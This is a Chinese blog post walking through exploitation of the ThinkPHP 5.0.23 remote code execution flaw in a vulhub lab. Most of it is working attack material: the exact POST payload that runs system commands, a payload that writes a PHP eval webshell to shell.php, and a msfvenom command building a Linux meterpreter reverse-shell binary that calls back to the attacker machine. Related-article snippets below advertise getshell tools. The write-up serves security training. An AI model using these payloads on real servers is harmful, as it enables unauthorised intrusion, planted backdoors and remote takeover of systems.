ThinkPHP漏洞先通过bur得到shell 再通过msf得到meterpreter

于 2023-05-20 15:21:57 发布
阅读量161 收藏
点赞数
文章标签: 安全 web安全 网络安全 系统安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72125469/article/details/130773387
版权

实验前提

靶机     172.23.19.153

攻击机 172.23.19.152

漏洞使用的是vulhubThinkPHP 5.0.23-Rce

第一种 使用BurpSuite

1 访问 http://172.23.19.153:8080/index.php?s=captcha

2 通过burp截取get数据包  更改数据请求方式为post数据包

直接把GET就改为POST 并且加上一条POST特有语句

Content-Type: application/x-www-form-urlencoded

3 发送至request模块

构造poc 执行 ls id pwd 命令

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

 构造poc创建shell.php 写入一句话木马

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo '<?php @eval($_POST['shell'])?>' >shell.php

 使用蚁剑进行连接

使用msfvenom 生成 可执行payload

 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=172.23.19.152 LPORT=7777 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf > ss.elf

在监听模块 监听 (生成执行文件的端口要和这里保持一致)

 

 把可执行程序 ss.elf 拖拽到蚁剑当中 修改权限为777 并且执行

于是得到了 meterpreter

 

 

Hello-smile
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
使用PHP有效负载(msf)和ngrok进行黑客攻击 (ABPET)
我不是猫叔
09-11 631
使用PHP有效负载和ngrok 进行黑客攻击 我们将使用PHP有效负载进行黑客攻击,在本教程中我们将使用msfvenom(其实就是MSF)。 Msfvenom包含在kali linux操作系统中 工具准备阶段 步骤1:安装ngrok 请按照说明书安装ngrok。 让我们从下载ngrok开始。在这里下载ngrok。https://ngrok.com/download. 一旦ngrok完成下载,...
thinkphp漏洞检测工具
06-06
thinkphp漏洞检测工具
ThinkPHP 远程命令执行漏洞复现(GetShell)
热门推荐
xy_sugar的博客
12-14 28万+
漏洞概况 ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的站点数量之多,该漏洞还是存在一定的影响范围。由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞漏洞危害 攻击者可通过该漏洞获取...
msf php,Metasploit溢出phpMyAdmin漏洞
weixin_39817391的博客
03-09 231
利用phpMyAdmin漏洞上传***程序,获得webshell。CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程***者在请求参数中插入执行命令。一、利用nmap工具扫描目标主机1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。1.2在终端中输入命令“nmap –sV 192.168.1.3”,对目标主机进行端口扫描,发现开放80端口。1.3在浏览...
MSF复现Thinkphp漏洞
weixin_51151498的博客
02-09 302
MSF复现漏洞
MSF复现thinkphp(详细版)
m0_72125469的博客
05-17 362
设置lhost 这个ip为攻击机ip(因为这个payload是反弹shell 我们需要在一个终端进行监听)4 由图可以看出我们需要填写 exp的 RHOSTS 以及模块内payload的LHOST。我们发现关于 thinkphp的exp只有一个(并且Rank为excellent)5 设置rhosts 这个ip是靶场的ip 默认端口为8080我们不需要修改。使用search 搜索关于thinkphp的exploit(漏洞利用)并且可以使用shell命令进入bash的shell 进行操作。
thinkphp漏洞图形化综合利用工具
05-23
Thinkphp(GUI)漏洞综合利用工具,支持各版本TP漏洞检测,命令执行,getshell。 (如果感觉对您有帮助,感觉不错的话,请您给个大大的支持) JFormDesigner可视化编写,没有javafx可视化好用(建议学javafx)。 检测不...
thinkphp漏洞一键检测工具最新版
03-23
thinkphp漏洞检测工具,漏洞POC基本适用ThinkPHP全版本漏洞
ThinkPHP v5.x命令执行利用工具(可getshell
11-19
ThinkPHP v5.x命令执行利用工具(可getshell
python3编写ThinkPHP命令执行Getshell的方法
09-19
主要介绍了python3编写ThinkPHP命令执行Getshell的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
phpMyAdmin4.8.1漏洞复现及利用
qq_43579362的博客
09-08 2064
一.环境配置 我采用的是Windows+phpstudy配置的运行环境,将phpMyAdmin4.8.1下载好解压到phpstudy网站根目录即可,这里需要注意的是php版本和Mysql的版本 配置好后,直接访问http://localhost/phpMyAdmin 登陆成功成功后你会遇到下图 解决方法: 修改phpMyAdmin/libraries文件下的config.default.php里面的$cfg['blowfish_secret']配置,随意修改保存即可,长度一定要达到要求。 二.漏洞
MSF漏洞利用模块 - exploits(MS17-010永恒之蓝、thinkphp漏洞
weixin_57448301的博客
04-21 205
MSF漏洞exploits模块的利用(永恒之蓝、thinkphp
thinkphp5调用shell脚本_【ThinkPHP5】远程代码执行
weixin_39607710的博客
01-03 493
跟着小编一起动手操作吧!ThinkPHP5远程代码执行漏洞实验内容ThinkPHP是一个免费开源的快速、简单、面向对象的轻量级PHP开发框架,是为了敏捷Web应用开发和简化企业应用开发而诞生。ThinkPHP 5.0版本是一个颠覆和重构版本,采用全新的架构思想,引入了更多的PHP新特性,优化了核心,减少了依赖,实现了真正的惰性加载,支持composer,并针对API开发做了大量的优化。ThinkP...
php提权教程,thinkphp 5.x版本代码执行可直接提权getshell
weixin_39647412的博客
03-10 1465
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。影响范围5.x < 5.1.31, <= 5.0.23漏洞分析Thinkphp v5.0.x补丁地址: htt...
ThinkPHP5 5.0.23 远程代码执行漏洞
Gjqhs的博客
03-09 652
ThinkPHP是国内使用极为广泛的PHP开发框架。在其 5.0(<5.0.24) 版本中,框架在获取请求方法时,对其进行了错误的处理,使得攻击者可以调用 Request 类的任意方法,从而通过特定的利用链导致 RCE 漏洞。 环境设置 Vulhub 靶场下载使用_Gjqhs的博客-CSDN博客 进入对应目录 cd /home/vulhub/thinkphp/5.0.23-rce/ 也可以一步步来 输入以下命令:(ThinkPHP版本:5.0.23) docker-compo
thinkphp3.1.3 getshell_ThinkPHP3由注入导致的getshell
weixin_39585035的博客
11-21 2048
起因搞一个thinkphp3.1.3开发的贷款诈骗站。大佬通过xss钓鱼,让管理员下载免杀的木马上线,然后拿到了源码。审计源码发现前台存在因为$_REQUEST获取数据而导致的注入,但是密码加密方式为:解开密码的概率不大,同时在后台也没能找到getshell的地方。类似钓鱼,诈骗这类的网站几乎都是在和数据库交互,操作文件的地方比较少。正文Demo如下:我这里使用的thinkphp3.2....
thinkphp 5-rce(rce漏洞getshell
weixin_51692662的博客
11-03 2547
thinkphp 5-rce(rce漏洞getshell
ThinkPHP 5.0 get SHELL
q412539429的博客
02-19 964
Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f 路由信息中controller的部分进行了过滤,可知问题出现在路由调度时 关键代码: 在修复之前程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。 1.利用sys...
ThinkPHP一键检测ThinkPHP漏洞,漏洞检测工具
最新发布
07-27
1. ThinkPHP漏洞检测工具 - 这是一个专门用于检测ThinkPHP漏洞的工具,可以通过扫描目标网站来发现可能存在的漏洞,并提供相应的修复建议。 2. Metasploit - Metasploit是一个功能强大的渗透测试框架,其中包含了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hello-smile

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值